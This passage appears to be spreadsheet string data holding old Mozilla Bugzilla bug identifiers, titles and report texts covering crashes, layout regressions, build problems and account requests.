  <si>
    <t>We could found native names automatically since bug 352174 is fixed.</t>
  </si>
  <si>
    <t>CORE-93836</t>
  </si>
  <si>
    <t>Implement  to match section 3.3 of XUL spec.</t>
  </si>
  <si>
    <t>This bug is tracking the deprecation of  and its replacement
with .</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-352708</t>
  </si>
  <si>
    <t>2006091405 NB: When the page is displayed in the tab by the background the page is not displayed</t>
  </si>
  <si>
    <t>In Firefox there is no problem. 
The content of the page is not displayed when switching to the tab when the page is read to the 
tab by the background. 
Reproducible: Always
Steps to Reproduce:
1. Open Preferences --&gt; Tab
2. checked Load in the background
3. Close Preferences
4. Open URL
5. A suitable link is opened in a new tab. 
2006091222 (v1.2+) NB : OK
2006091405 (v1.2+) NB : NG
Mac OS X 10.3.9</t>
  </si>
  <si>
    <t>CORE-505693</t>
  </si>
  <si>
    <t>Remove nsIView::DisownWidget</t>
  </si>
  <si>
    <t>Created attachment 389896
fix
No longer used now that nsObjectFrame manages its own widget.</t>
  </si>
  <si>
    <t>NSPR-841651</t>
  </si>
  <si>
    <t>[OTA] PR_SetThreadPriority doesn't do anything when using Bionic</t>
  </si>
  <si>
    <t>So in talking with bent on IRC RuntimeService::ScheduleWorker (http://mxr.mozilla.org/mozilla-central/source/dom/workers/RuntimeService.cpp#933) supposedly lowers the priority of DOM Worker threads.
The priority-&gt;SetPriority resolves to nsThread::SetPriority (http://mxr.mozilla.org/mozilla-central/source/xpcom/threads/nsThread.cpp#659)
which in turn calls PR_SetThreadPriority (http://mxr.mozilla.org/mozilla-central/source/nsprpub/pr/src/pthreads/ptthread.c#613)
Under bionic neither _PR_DCETHREADS nor _POSIX_THREAD_PRIORITY_SCHEDULING is defined (I confirmed by adding a #else and a print and saw the print).
This means that calls to PR_SetThreadPriority essentially do nothing under bionic.</t>
  </si>
  <si>
    <t>gsvelto</t>
  </si>
  <si>
    <t>CORE-45914</t>
  </si>
  <si>
    <t>Changing the value of a hidden XUL menu from JS makes it visible</t>
  </si>
  <si>
    <t>If you have a XUL menu which has been hidden by setAttribute(hidden true) 
and you change its value (setAttribute(value foobar)) then the menu shows up 
in the menubar. It should not.
The reason this is happening is because the AttributeChanged call on nsMenu is 
not checking the hidden attribute when handling changes to value.
In addition care is needed when inserting the new menu to ensure that it gets 
inserted in the right place (can't just use InsertMenu(mMacMenuHandle 
mMacMenuID+1)</t>
  </si>
  <si>
    <t>TOOLKIT-385734</t>
  </si>
  <si>
    <t>Don't clear download status on pause clean up DownloadProgressListener</t>
  </si>
  <si>
    <t>I had a patch... but apparently something went wrong... but I have the notes I jotted down..... of various OCD nits :p Patch will be after changes for bug 237693 and bug 385733.
wrong/unecessary emacs formatting hint
gStrings ??
space before ( for functions
trailing spaces on a line
80 characters per line
lastUpdate is being compared to .getTime() (which is on orders of trillions)
refactor getDownload from aDownload.id
short circuit/return early if no download (we're only updating UI in this file)
convert var to let (block level variable scoping)
align new lines correctly
create let block scopes for localized variable use (e.g. |now|)
|aMaxTotalProgress| comes in as a PRInt64 (an integer)
same line returns with ifs
collapse bounds check with |Math.min|
no need to hint float with .0 for javascript
space spaces operators (e.g. * /)
|percent| isn't used on the else path
explicitly show what condition we want (not just implicit non zero)
consolidate common calls with differing arguments
newline between methods
parameter variables are prefixed with |a|
remove spaces just inside function decl/calls
don't create unnecessary variables
more descriptive variable names</t>
  </si>
  <si>
    <t>FIREFOX-364325</t>
  </si>
  <si>
    <t>History search shows the results in wrong (reverse) sort order</t>
  </si>
  <si>
    <t>Steps to reproduce:
- start a new profile with blank history
- open the sidebar set View to By Last Visited
- visit https://bugzilla.mozilla.org/show_bug.cgi?id=257334
- visit https://bugzilla.mozilla.org/show_bug.cgi?id=362003
- verify that bug 362003 is on top in the history sidebar (that's correct)
- now do a history search for history.dat in the sidebar
Result: both entries change position: the last visited address is no longer on top (like in Firefox 2.0)</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-326556</t>
  </si>
  <si>
    <t>[Meta] 0.5 Release</t>
  </si>
  <si>
    <t>NSS-390381</t>
  </si>
  <si>
    <t>libpkix rejects cert chain when root CA cert has no basic constraints</t>
  </si>
  <si>
    <t>Created attachment 274690
cert with netscape cert type extension
While testing libpkix verify cert wrapper with live ssl sites I've run into the failure with the symptom that the library fails to match eku. The cert has 
Netscape Cert Type and nss successfully validates it. But the cert does not have a supported extended key usage.
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            5b:ca:d5:7e:5e:04:9d:79:6b:04:ad:8d:3b:6c:12:f1
        Signature Algorithm: PKCS #1 MD5 With RSA Encryption
        Issuer: OU=www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 V
            eriSignOU=VeriSign International Server CA - Class 3OU=VeriSig
            n Inc.O=VeriSign Trust Network
        Validity:
            Not Before: Tue Jan 09 00:00:00 2007
            Not After : Sat Feb 02 23:59:59 2008
        Subject: CN=www.fastnet.com.phOU=Member VeriSign Trust NetworkO
            U=Authenticated by mySecureSign Inc.OU=Terms of use at www.my
            securesign.com/rpa (c) 01OU=Technical Support DepartmentO=Equit
            able PCI BankL=Makati CityST=Metro ManilaC=PH
        Subject Public Key Info:
            Public Key Algorithm: PKCS #1 RSA Encryption
            RSA Public Key:
                Modulus:
                    e0:f4:86:65:8e:39:7a:7b:5f:65:3a:57:9b:95:b0:ff:
                    e9:01:7e:e2:93:82:48:b5:5a:8e:39:a5:d6:9d:9b:09:
                    ff:c2:34:44:b7:3c:d3:e8:a3:69:ce:9f:07:b8:65:73:
                    b4:c4:ae:07:48:9b:cf:84:d6:17:a4:0e:86:dc:f0:4b:
                    2d:6f:bc:55:4e:19:d6:c7:27:f0:4c:19:8e:04:40:bb:
                    97:e1:83:27:9e:6a:b6:29:3e:52:f7:ac:06:2f:7f:0d:
                    20:0c:2b:f0:63:9e:db:59:9c:e8:c0:62:60:a9:92:62:
                    86:72:60:84:28:b1:f3:93:0c:34:1c:99:c1:a2:9f:87
                Exponent: 65537 (0x10001)
        Signed Extensions:
            Name: Certificate Basic Constraints
            Data: Is not a CA.
            Name: Certificate Policies (Obsolete)
            Data: Sequence {
                Sequence {
                    Sequence {
                        Verisign User Notices
                        Sequence {
                            This certificate incorporates by reference and 
                            its use is strictly subject to the VeriSign Cert
                            ification Practice Statement (CPS) available at:
                             https://www.verisign.com/CPS by E-mail at CPS-r
                            equests@verisign.com or by mail at VeriSign Inc
                            . 2593 Coast Ave. Mountain View CA 94043 USA T
                            el. +1 (415) 961-8830 Copyright (c) 1996 VeriSign
                             Inc.  All Rights Reserved. CERTAIN WARRANTIES D
                            ISCLAIMED and LIABILITY LIMITED.
                            [0]: {
                                OID.2.16.840.1.113733.1.7.1.1.1
                            }
                            [1]: {
                                OID.2.16.840.1.113733.1.7.1.1.2
                            }
                            Sequence {
                                Sequence {
                                    https://www.verisign.com/repository/CPS 
                                }
                            }
                        }
                    }
                }
            }
            Name: Certificate Type
            Data: 
            Name: Extended Key Usage
                Strong Crypto Export Approved
                Microsoft SGC SSL server
    Signature Algorithm: PKCS #1 MD5 With RSA Encryption
    Signature:
        63:ce:bc:47:a4:0a:a9:67:2e:c2:0a:34:78:a4:a4:8e:
        85:88:71:83:ca:98:97:b7:c1:5a:f4:f3:be:11:e0:2a:
        56:7f:55:10:3d:2f:cb:d7:fe:38:8c:89:b0:56:2b:8c:
        5d:85:e1:36:fd:5e:7e:7f:9c:78:08:56:9c:27:66:da:
        21:02:08:db:93:a0:8b:86:a9:4b:5c:70:eb:80:35:36:
        34:ef:3f:b2:5d:90:76:06:b8:b6:12:0e:57:c5:4d:5e:
        80:8a:43:e2:a5:85:b8:6e:87:ea:e6:4b:9b:08:30:f0:
        c6:b7:b8:5e:44:6a:57:5f:5f:c0:5e:7b:4e:40:5f:c0
    Fingerprint (MD5):
        6B:0C:BC:86:F7:0C:F1:0D:EA:18:12:38:42:58:3C:EB
    Fingerprint (SHA1):
        1B:FC:60:25:0F:02:B0:06:F5:92:10:1F:48:37:F1:49:FF:D0:71:69
    Certificate Trust Flags:
        SSL Flags:
        Email Flags:
        Object Signing Flags:</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-463284</t>
  </si>
  <si>
    <t>Tracking bug for Build and Release of TB2.0.0.18</t>
  </si>
  <si>
    <t>Still waiting on one change on the relbranch.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-289581</t>
  </si>
  <si>
    <t>Move Hula to orga</t>
  </si>
  <si>
    <t>Hula is currently running on star but it doesn't use much CPU if any and
talkback needs a server.  Orga is a single-CPU box (Dell PowerEdge 750) which
may or may not be stable but since Hula's still experimental it can live there
for now.  The LDAP server should probably move too for now.  I'm not sure if
there's anything actually in it worth keeping or if it's still just a basic
setup I haven't put anything important in it yet don't know if Chase has...</t>
  </si>
  <si>
    <t>CORE-293504</t>
  </si>
  <si>
    <t>margin problems on a certain page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050509 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050509 Firefox/1.0+
The checkin for bug 292370 seemed to cause a regression that messed up the
layout on http://www.steampowered.com.
The navigation images on top have some spaces between them that should not be
there and the middle box with the content seems to have a glitch on the right
hand side.
Testcase coming up soon.
Reproducible: Always</t>
  </si>
  <si>
    <t>bugs.caleb</t>
  </si>
  <si>
    <t>CALENDAR-303830</t>
  </si>
  <si>
    <t>Weekly recurrence doesn't work properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050806 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050807 Mozilla Sunbird/0.2+
The weekly recurrence only repeats the event on the weekday the first event was
created (i.e if the startday on the first event is on a sunday it will only
repeat on sundays even if you select more weekdays)
Reproducible: Always
Steps to Reproduce:
1. Create a event
2. Select weekly recurrence
3. Select multiple weekdays
Actual Results:  
The event is only repeated on the weekday of were the original event was created
Expected Results:  
The event should be repeated on the weekdays that is specified in the recurrence
options for that event.</t>
  </si>
  <si>
    <t>CORE-337418</t>
  </si>
  <si>
    <t>[@ PR_EnumerateHostEnt] flaky wifi connection or vpn or laptop sleeping</t>
  </si>
  <si>
    <t>Incident ID: 18519692
Stack Signature	PR_EnumerateHostEnt aad9b2b0
Product ID	Firefox15
Build ID	2006050410
Trigger Time	2006-05-10 04:58:57.0
Platform	Win32
Operating System	Windows NT 5.1 build 2600
Module	nspr4.dll + (0000cb31)
URL visited	no clue i was hopping from wifi network to wifi network and pac/no pac
User Comments	
Since Last Crash	70200 sec
Total Uptime	90970 sec
Trigger Reason	Access violation
Source File Line No.	c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/nsprpub/pr/src/misc/prnetdb.c line 1408
Stack Trace 	
PR_EnumerateHostEnt  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/nsprpub/pr/src/misc/prnetdb.c line 1408]
jay: could you please pull detailed stack information for this crash?</t>
  </si>
  <si>
    <t>NSPR-104529</t>
  </si>
  <si>
    <t>PR_fprintf I/O function misbehaves with standard output</t>
  </si>
  <si>
    <t>On OS/2 when writing directly to standard output fd writing \n goes to the
next line but also keeps the cursor at the same column as it was. As a result
everything is garbled in command-line programs using NSPR. Eg. the following code :
	PR_fprintf(PR_STDOUT
\nNetscape Cryptographic Module Utility\n
Usage: modutil [command] [options]\n\n
                            COMMANDS\n
produces the following output
Netscape Cryptographic Module Utility
                                     Usage: modutil [command] [options]
                   COMMANDS
Basically all \n need to be converted to \n\r in order to let the cursor return
to the beginning of the line before writing further.</t>
  </si>
  <si>
    <t>CORE-395412</t>
  </si>
  <si>
    <t>Crash on sites with Java applets with AdBlock Plus 0.7.5.1 installed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.9a8pre) Gecko/2007090704 Minefield/3.0a8pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/20070905 Minefield/3.0a8pre
There are several Java-related crashes when AdBlock Plus is installed.
Here's another one.
Steps to reproduce:
With AdBlock Plus installed go to http://www.java.com/en/download/installed.jsp and click on the green Verify Installation button.
Reproducible: Always
Steps to Reproduce:
1. Have AdBlock Plus 0.7.5.1 installed (filter settings do not matter)
2. Go to http://www.java.com/en/download/installed.jsp .
3. Click the green Verify Installation button.
Actual Results:  
Crash with Breakpad trigger:
http://crash-stats.mozilla.com/report/index/da4932d7-5d5e-11dc-96ec-001a4bd46e84
http://crash-stats.mozilla.com/report/index/3d3753e3-5d5e-11dc-a943-001a4bd43ef6
(just two examples)
Expected Results:  
The result of the Java installation verification process should be shown.
Expected is information if you have the most recent version of Java installed.
Regressionwindow:
Works in 20070905_1328
Broken in 20070905_1344 
Can be circumvented by de-installing AdBlock Plus (de-activating only does not help!)</t>
  </si>
  <si>
    <t>gerd_roethig</t>
  </si>
  <si>
    <t>FIREFOX-343104</t>
  </si>
  <si>
    <t>In RTL UI tabbrowser's scroll arrows are scrolling in reverse</t>
  </si>
  <si>
    <t>Found this while working on bug 343097
Under RTL UI the tabbrowser's scroll arrows are scrolling in reverse.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-624467</t>
  </si>
  <si>
    <t>Please create LDAP for pippa@mozillafoundation.org</t>
  </si>
  <si>
    <t>Full Name: Pippa Buchanan
Type of employee: Contractor
Start date: ??
Manager: Mark Surman
Location: Australia
Mailing lists: all@mozillafoundation.org</t>
  </si>
  <si>
    <t>henry</t>
  </si>
  <si>
    <t>hhall</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-134931</t>
  </si>
  <si>
    <t>iomega.com - DHTML dropdown menus misformatted</t>
  </si>
  <si>
    <t>The nav menus at this URL (which has just been Slashdotted...) all appear at the
extreme left of the page. Moz 2002031608 NT4 SP6</t>
  </si>
  <si>
    <t>imipak</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-331622</t>
  </si>
  <si>
    <t>extensions/metrics doesn't build on the 1.8 branch</t>
  </si>
  <si>
    <t>extensions/metrics doesn't build on the 1.8 branch
NS_ASSIGNMENT_COPY is not defined there.</t>
  </si>
  <si>
    <t>CORE-415273</t>
  </si>
  <si>
    <t>moz-icon failing to display correct icon with contentType parameter specified</t>
  </si>
  <si>
    <t>Recently moz-icon urls that specify contentType as a parameter fail to display the correct icon for certain application file types. The icon displayed is the generic white paper icon instead.
To reproduce type - 
moz-icon://somefile.zip?size=32&amp;contentType=application/zip
in the address bar.
Result: you should see the generic icon.
Display is correct if you remove the contentType parameter - 
moz-icon://somefile.zip?size=32
A found at least one other app that failed as well -
moz-icon://somefile.ipa?size=32&amp;contentType=application/x-itunes-ipa
vs.
moz-icon://somefile.ipa?size=32
which worked.
This shows up most notably in the content handler dialog and in the app picker dialog when users click on a link to a zip file.
A little debugging - the icon file is opened successfully in both cases within  nsIconCahnnel - 
http://lxr.mozilla.org/mozilla/source/modules/libpr0n/decoders/icon/win/nsIconChannel.cpp#273</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-466507</t>
  </si>
  <si>
    <t>crash [@nsImapProtocol::SetupWithUrl]</t>
  </si>
  <si>
    <t>Created attachment 349772
proposed fix
the fix for bug 396874 introduced a regression sometimes m_runningUrl is null and we crash trying to retry a url.
The fix is to do a null check - I'm not quite sure why m_runningUrl gets nulled out but we check it earlier as well.</t>
  </si>
  <si>
    <t>CORE-364079</t>
  </si>
  <si>
    <t>Right margin too wide in certain case of over-constrained block in RTL context</t>
  </si>
  <si>
    <t>When a block inside an RTL block has a width and both left and right margins specified and the sum of the specified margins and width is less than the available width the specified value for the left margin is effectively added to the right margin.
The page in the URL field is a real-life example (the content should be approximately centered on the white background but appears adjacent to its left side instead).
This could also be seen in the Normal margins and Relative positioned &amp; margins sections of attachment 232963 (testcase for bug 328181) - the right margin on the in-RTL blocks is 20px larger than it should be.
Prior to the reflow branch landing this apparently only affected cases where the contained block and containing block were of opposite directionality (which are relatively rare). For the (more common) cases where both blocks are RTL this is technically a regression from bug 300030.
Patch coming up.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-668617</t>
  </si>
  <si>
    <t>create basedir for slave if it doesn't exist</t>
  </si>
  <si>
    <t>Created attachment 543227
create basedir in case it doesn't exist
dustin what do you think of this patch?
This will help when recreating the E drive for the win64 job.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-483996</t>
  </si>
  <si>
    <t>Create directory tree of all existing partner repack customizations suitable for import into hg</t>
  </si>
  <si>
    <t>Kev is in the process of creating this directory structure I just wanted to get a bug on file for it. This directory structure will be checked into an hg repo for access by the build automation.
I'm planning to store the script(s) used to repack builds alongside the actual partner repack config data. The complete directory structure will look something like this:
partner-repacks/
    partners/
        google/
            repack.cfg
            distribution/
            searchplugins/
        yahoo/
            repack.cfg
            distribution/
            searchplugins/
        .../
    scripts/
        partner-repacks.py
Note: I only need Kev to provide the contents of the partners/ subdir for this bug.</t>
  </si>
  <si>
    <t>CORE-55212</t>
  </si>
  <si>
    <t>Wrong window closes (and keys go to inactive window)</t>
  </si>
  <si>
    <t>- quickly hit cmd-m then cmd-n
- wait for both windows to show up (nav window is active)
- hit cmd-w
expected:
- nav window should close
actual:
- mail compose window (even though it's deactivated) closes
also all keys typed go into the address field of mail compose. This is very
confusing to users.</t>
  </si>
  <si>
    <t>SEAMONKEY-310485</t>
  </si>
  <si>
    <t>List of pages to go back (small arrow at Back button) doesn't pop up</t>
  </si>
  <si>
    <t>When the Back (or Forward) button is enabled you have a small arrow besides the
Back button on which you can click to see a list of all sites you can go back to
(and jump directly to one). Starting with the 2005-08-28 build you click that
small arrow and no popup with the list of sites opens. This worked with the
2005-08-27 build.
Bonsai link:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=MozillaTinderboxAll&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2005-09-27+05%3A00%3A00&amp;maxdate=2005-09-28+06%3A00%3A00&amp;cvsroot=%2Fcvsroot</t>
  </si>
  <si>
    <t>CORE-218344</t>
  </si>
  <si>
    <t>[ps] grayscale postscript printing only uses red channel of images</t>
  </si>
  <si>
    <t>If you select grayscale in the print properties the images output will only
be the red channel of the images.  This can lead to odd results - it should
use a perceptual mix of the three channels.</t>
  </si>
  <si>
    <t>BUGZILLA-301067</t>
  </si>
  <si>
    <t>[PostgreSQL] editusers.cgi doesn't do a case-insensitive comparison</t>
  </si>
  <si>
    <t>editusers.cgi says case-insensitive substring but PostgreSQL clearly doesn't
do that see lines 111-121:
            $query .=  $nextCondition profiles.login_name 
            if ($matchtype eq 'regexp') {
                $query .= $dbh-&gt;sql_regexp . ' ?'
                $matchstr = '.' unless $matchstr
            } elsif ($matchtype eq 'notregexp') {
                $query .= $dbh-&gt;sql_not_regexp . ' ?'
                $matchstr = '.' unless $matchstr
            } else { # substr or unknown
                $query .= 'like ?'
                $matchstr = %$matchstr%
            }
This part was missed by bug 285695.
If it's not a performance issue we could remove the substring part completely
and do a regexp by default which is really case-insensitive even in Pg.</t>
  </si>
  <si>
    <t>CORE-458092</t>
  </si>
  <si>
    <t>Crashes with BadIdChoice X errors</t>
  </si>
  <si>
    <t>This may be the same as bug 454677 but it started happening quite often to me only in the last few days so I suspect it's different.
In the past four days I've crashed three times with a BadIdChoice X error:
2008-09-28 12:42:13
2008-09-29 18:47:44
2008-10-01 10:39:24
The first two times the error looked like this:
The program 'firefox-bin' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadIDChoice (invalid resource ID chosen for this connection)'.
  (Details: serial 158749545 error_code 14 request_code 155 minor_code 4)
  (Note to programmers: normally X errors are reported asynchronously
   that is you will receive the error a while after causing it.
   To debug your program run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)
(different serial the second time)
But the third time it gave me more information:
The program 'firefox-bin' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadIDChoice (invalid resource ID chosen for this connection)'.
  (Details: serial 150818044 error_code 14 request_code 155 minor_code 4)
  (Note to programmers: normally X errors are reported asynchronously
   that is you will receive the error a while after causing it.
   To debug your program run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)
Locking assertion failure.  Backtrace:
#0 /usr/lib/libxcb-xlib.so.0 [0x7f833992297c]
#1 /usr/lib/libxcb-xlib.so.0(xcb_xlib_lock+0x15) [0x7f8339922a15]
#2 /usr/lib/libX11.so.6 [0x7f833d7e4323]
#3 /usr/lib/libXrender.so.1(XRenderFreePicture+0x46) [0x7f833abd87c6]
#4 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/libthebes.so [0x7f83327bd8f4]
#5 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/libthebes.so(_moz_cairo_surface_finish+0x3b) [0x7f83327a51cb]
#6 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/libthebes.so(_moz_cairo_surface_destroy+0x58) [0x7f83327a5248]
#7 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/libthebes.so(_ZN11gfxASurface7ReleaseEv+0x36) [0x7f83327676c6]
#8 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libgkgfxthebes.so [0x7f832eed9c6f]
#9 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libgkgfxthebes.so [0x7f832eeda2ba]
#10 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libgkgfxthebes.so [0x7f832eee5544]
#11 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libgkgfxthebes.so [0x7f832eee584f]
#12 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/libxpcom_core.so(_ZN15nsCOMArray_baseD2Ev+0x3b) [0x7f833fd9b0eb]
#13 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libimglib2.so [0x7f832f30ed41]
#14 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libimglib2.so [0x7f832f30cccf]
#15 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libimglib2.so [0x7f832f31f178]
#16 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libimglib2.so [0x7f832f31d52c]
#17 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libimglib2.so [0x7f832f31820a]
#18 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/components/libimglib2.so [0x7f832f31ac35]
#19 /home/dbaron/builds/mozilla-central/obj/firefox-debugopt/dist/bin/libxpcom_core.so(PL_DHashTableFinish+0x73) [0x7f833fd96b43]
I'm going to attempt to turn the above stack into something more useful although it will be a little tricky.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-372852</t>
  </si>
  <si>
    <t>Some Extensions don't have any categories</t>
  </si>
  <si>
    <t>Because the available categories got shuffled a bit a bundle of extensions (example in URL) don't have categories anymore. This has caused some problems in the past and right now the first thing I noticed was that the Find similar addons part is empty. I'm assuming we could either send mail to all the authors who don't have a category for some of their extensions yet or add some ourselves.</t>
  </si>
  <si>
    <t>SEAMONKEY-50326</t>
  </si>
  <si>
    <t>Helper Apps Decision Tracking</t>
  </si>
  <si>
    <t>There are many different bugs around Helper Apps without any spec of exactly
what we are going to do and what we are not going to do.  We need a single bug
to track all the others and we need a plan for what minimum set of stuff we
need to fix.
assigning to bill law to search for all helper app related bugs and attach them
to this one.  You can reassign to johng when you add those bugs.  cc'ing sol
(since johng will be out of town for a week) and jar.</t>
  </si>
  <si>
    <t>johng</t>
  </si>
  <si>
    <t>THUNDERBIRD-364082</t>
  </si>
  <si>
    <t>mail lost when moving from local to remote folder in offline mode</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1) Gecko/20061202 Firefox/2.0
Build Identifier: Thunderbird/1.5.0.8
Hi!
Thunderbird 1.5.0.8 reproducably loses mails that are moved from local folders to remote IMAP folders in offline mode on at least Windows XP and Linux.
Best regards
Christian
Reproducible: Always
Steps to Reproduce:
1. When not in offline mode create a mail and save it to a remote folder.
2. Drag the mail to a local folder.
3. Switch to offline mode without downloading messages for offline use.
4. Drag the mail back to a remote folder.
5. Turn off offline mode.
Actual Results:  
The mail is lost and it seems to be impossible to recover.
Expected Results:  
As long as in offline mode the mail should be cached somewhere.  It should be displayed (including message body) when viewing the remote folder.  When switching to online mode it should be uploaded to the remote folder.</t>
  </si>
  <si>
    <t>again</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-475204</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/quality/precheckin-tests.html</t>
  </si>
  <si>
    <t>lameiro</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-98278</t>
  </si>
  <si>
    <t>xpcom api changes meta bug</t>
  </si>
  <si>
    <t>THUNDERBIRD-459096</t>
  </si>
  <si>
    <t>thundertab session restore</t>
  </si>
  <si>
    <t>With the new tabbed interface (bug 218999 and see attachment 341994 from bug 402365) we'll have a tabbed interface enabled in Thunderbird.  With our new tabs our users deserve to have their tab states saved on shutdown or crash through session restore.
There already exists bug 408338 about Thunderbird having session restore and bug 449967 about generalizing the toolkit session restore this bug is specifically about implementing tab session restore.
Each tab opened in Thunderbird will be viewing a search result calendar tasks or possibly address book (see bug 457270).   When a user shuts down Thunderbird we need to save the position and state of each of these tabs. 
In Firefox when you run the browser after saving your session it asks you in a dialog before starting if you want to restore the session or start a new one.  In Thunderbird we are going to do this a bit better than that.  On start up Thunderbird should open normally with one extra tab in focus a session restore tab.  
In the session restore tab we can list the various tabs a person had open in a grid layout.  Each item in the grid can be opened individually as well as having an option listed above all tabs to restore the entire session.  This session restore tab can remain around until the user selects ( Restore Entire Session ) or closes the tab manually.
When we restore a tab Thunderbird should attempt to bring it back to the exact state it was previously including focus and scroll positions.  Obviously in mail like the web sometimes what a person was looking at before no longer exists (at least in the same place).  When the tab cannot be restored exactly as it was Thunderbird can do it's best and simply rerun the tab search command.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-304477</t>
  </si>
  <si>
    <t>Release notes should mention that -remote is broken/deprecated</t>
  </si>
  <si>
    <t>Someone on #developers mentioned Asa's name in connection with release notes.
Sorry Asa if you're not the right assignee.
Bug 280725 implementing auto-remote broke -remote: it no longer handles urls
containing commas as described in bug 298960. I'm assuming -remote is
deprecated if that's not going to be fixed though that's a policy decision
someone should probably make.
This should be releasenoted (if it's not going to be fixed) since a lot of
people use -remote and will wonder why sometimes it no longer works reliably.
Suggested placement: under Known Issues. I'm not sure if -remote should be under
Linux/Unix or All Systems -- did it work everywhere? Probably it's mostly
linux/unix users who care about it.
Suggested wording (or at least a start):
firefox -remote (mozilla-xremote-client) no longer works on urls containing
commas and is deprecated. Use firefox /url/ instead: it will automatically use
any currently running firefox to open the url according to the tab preferences.
firefox -new-window /url/ will open the url in a new window. There is no
-new-tab option as yet.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-285048</t>
  </si>
  <si>
    <t>nsImageWin::ConvertDDBtoDIB uses wrong color depth</t>
  </si>
  <si>
    <t>ConvertDDBtoDIB passes the color depth of the DDB to BuildDIB. That's wrong -
callers of nsImageWin::GetBits expect the color depth to be whatever nsImageWin
currently uses (24bpp usually). So this function should pass mNumBytesPixel*8
to BuildDIB.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-475210</t>
  </si>
  <si>
    <t>URLs in tooltips need to be unescaped</t>
  </si>
  <si>
    <t>We currently show URLs in tooltips for Back Forward and the throbber in the toolbar (I think that's it) for any bookmarks in the Bookmark Bar and for completed downloads.  There may be other places I'm forgetting.
None of these are currently escaped and they all probably should be.</t>
  </si>
  <si>
    <t>CORE-391479</t>
  </si>
  <si>
    <t>select list with opacity set is clipped</t>
  </si>
  <si>
    <t>Created attachment 275919
simple testcase
When opacity is set on a  element the last two rows of pixels are clipped incorrectly.</t>
  </si>
  <si>
    <t>WEBTOOLS-991990</t>
  </si>
  <si>
    <t>Multi-highlight ranges not always merged properly</t>
  </si>
  <si>
    <t>1. Go into dxr/tests/test_multi.
2. make &amp;&amp; dxr-serve.py -a target
3. Go to http://33.33.33.77:8000/code/source/makefile
4. Click line number 1.
5. Shift-click 2.
The hash becomes 11-2 but it should be simply 1-2.</t>
  </si>
  <si>
    <t>jamon</t>
  </si>
  <si>
    <t>DIRECTORY-152700</t>
  </si>
  <si>
    <t>compiler warnings caused by 119380 checkin</t>
  </si>
  <si>
    <t>ayn2 wrote:
&gt; This checking have added two might be used uninitialized warnings:
&gt; 
&gt; +directory/xpcom/base/src/nsLDAPBERValue.cpp:59
&gt; + `PRUint8 * array' might be used uninitialized in this function
&gt; +
&gt; +directory/xpcom/base/src/nsLDAPMessage.cpp:600
&gt; + `nsresult rv' might be used uninitialized in this function
It turns out that the first warning even uncovered a bug though a completely
trivial one.  I've switched to gcc 3.1 so I'll start seeing these warnings also.
 Patch forthcoming.</t>
  </si>
  <si>
    <t>BUGZILLA-324990</t>
  </si>
  <si>
    <t>Bug Activity Page does not use bug summary in page title</t>
  </si>
  <si>
